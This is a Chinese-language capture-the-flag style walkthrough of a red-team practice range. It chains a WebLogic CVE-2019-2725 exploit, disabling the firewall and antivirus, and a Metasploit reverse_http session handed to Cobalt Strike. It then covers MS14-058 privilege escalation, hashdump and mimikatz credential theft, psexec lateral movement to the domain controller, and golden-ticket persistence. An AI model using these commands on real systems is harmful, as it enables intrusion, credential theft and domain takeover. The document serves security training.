ATT&CK红队评估实战靶场二

描述

红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。

靶场地址:漏洞详情

环境说明:10.10.10.1/24

DMZ网段:192.168.1.0/24

DC:10.10.10.10

WEB:10.10.10.80\192.168.1.8

PC:10.10.10.20\192.168.1.11

WEB机器开启WebLogic服务

C:\Oracle\Middleware\user_projects\domains\base_domain\bin 

startWebLogic---以管理员身份运行

ATT&CK红队评估实战靶场二_第1张图片

这个窗口不要关闭

ATT&CK红队评估实战靶场二_第2张图片

一、信息收集

扫描WEB主机

nmap -sV -T4 192.168.1.8

访问80端口,是空白

访问7001端口,发现是WebLogic服务

ATT&CK红队评估实战靶场二_第3张图片

访问控制台:192.168.1.8:7001/console/login/LoginForm.jsp

尝试弱口令登录,被拒绝

WeblogicScan 扫描漏洞

发现CVE-2019-2725

先将防火墙和360关闭

ATT&CK红队评估实战靶场二_第4张图片

web主机存在两个网段

ATT&CK红队评估实战靶场二_第5张图片

上线CS

创建侦听

ATT&CK红队评估实战靶场二_第6张图片

MSF转发会话

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.1.134
set lport 8855
set session 1

ATT&CK红队评估实战靶场二_第7张图片

ATT&CK红队评估实战靶场二_第8张图片

CS收到会话

设置睡眠:sleep 1

6ff0ea243e0040d7962f0b325565ae40.png

提升权限

利用插件:MS14-058漏洞提升权限

74f03692fd0542c5a8408b7b797f9ccf.png

扫描端口

explore--port scan--选择10.10.10.0网段扫描

ATT&CK红队评估实战靶场二_第9张图片

发现三台内网主机

获取hash

hashdump           #获取hash

logonpasswords  #获取明文密码

ATT&CK红队评估实战靶场二_第10张图片

查看域控

关闭防火墙:netsh advfirewall set allprofiles state off
查看有几个域:net view /domain
查看域名:net config workstation
查看域内主机:nei view
查询域内用户:net user /domain
查看域管理员:net group "domain admins" /domain  

ATT&CK红队评估实战靶场二_第11张图片

使用CS自带功能,RunMinikatz获取hash和明文密码

ATT&CK红队评估实战靶场二_第12张图片

创建SMB侦听器

name:自定义

payload:选择beacon SMB

save

ATT&CK红队评估实战靶场二_第13张图片

Psexec

目标需要开放445端口和admin

上线DC

ATT&CK红队评估实战靶场二_第14张图片

 选择de1ay\administrator账户

ATT&CK红队评估实战靶场二_第15张图片

Listener选择刚才创建的SMB

ATT&CK红队评估实战靶场二_第16张图片

session选择

上线DC

上线PC与上线DC步骤一致

ATT&CK红队评估实战靶场二_第17张图片

权限维持

在域控获得KRBTGT账户NTLM密码哈希和SID,然后复制保存到记事本!

ATT&CK红队评估实战靶场二_第18张图片

ATT&CK红队评估实战靶场二_第19张图片

域名:de1ay.com

ATT&CK红队评估实战靶场二_第20张图片

黄金票据利用

黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。

黄金票据的条件要求:

1.域名称

2.域的SID值

3.域的KRBTGT账户NTLM密码哈希

4.伪造用户名

黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当失去域控权限时,内其他在通过域任意机器伪造票据重新获取最高权限。

WEB主机 Administrator账户权限-t>右键->Access->Golden Ticke

ATT&CK红队评估实战靶场二_第21张图片

ATT&CK红队评估实战靶场二_第22张图片

伪造成功

ATT&CK红队评估实战靶场二_第23张图片

查看当前系统的票据:

mimikatz kerberos::list

ATT&CK红队评估实战靶场二_第24张图片

可以访问域控

ATT&CK红队评估实战靶场二_第25张图片

使用当前令牌登录PC

ATT&CK红队评估实战靶场二_第26张图片

勾选Use session's current access token

ATT&CK红队评估实战靶场二_第27张图片

ATT&CK红队评估实战靶场二_第28张图片

参考:

ATT&CK实战系列——红队实战(二)-腾讯云开发者社区-腾讯云

你可能感兴趣的:(笔记)